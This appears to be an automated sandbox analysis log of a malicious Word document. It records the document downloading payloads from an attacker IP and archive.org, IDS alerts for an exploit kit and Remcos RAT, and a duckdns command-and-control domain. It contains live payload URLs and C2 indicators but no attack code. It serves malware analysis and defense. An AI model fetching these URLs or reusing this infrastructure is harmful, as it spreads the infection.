              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 107.175.242.80:80 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 207.241.227.240:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 107.175.242.80:80 -> 192.168.2.22:49163
              Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 107.175.242.80:80 -> 192.168.2.22:49163
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49164 -> 192.210.214.9:14645
              Source: Malware configuration extractorURLs: 2024remcmon.duckdns.org
              Source: unknownDNS query: name: 2024remcmon.duckdns.org
              Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /430/KNOCC.txt HTTP/1.1Host: 107.175.242.80Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 192.210.214.9 192.210.214.9
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49165 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /430/sweetbuddygirltodaysherewith.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.242.80Connection: Keep-Alive
              Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.22:49162 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: unknownTCP traffic detected without corresponding DNS query: 107.175.242.80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,9_2_0041B380
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CC51DCBC-B941-4D7A-BFB9-1824D3A59C29}.tmpJump to behavior
              Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /430/sweetbuddygirltodaysherewith.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.242.80Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /430/KNOCC.txt HTTP/1.1Host: 107.175.242.80Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
              Source: global trafficDNS traffic detected: DNS query: 2024remcmon.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: powershell.exe, 00000008.00000002.376723049.0000000002609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.242.80
              Source: powershell.exe, 00000008.00000002.376723049.0000000002609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.242.80/430/KNOCC.txt
              Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.355352588.000000000059F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355352588.0000000000594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.242.80/430/sweetbuddygirltodaysherewith.tIF
              Source: EQNEDT32.EXE, 00000002.00000002.355352588.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.242.80/430/sweetbuddygirltodaysherewith.tIFj
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.873432773.0000000000541000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.873432773.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
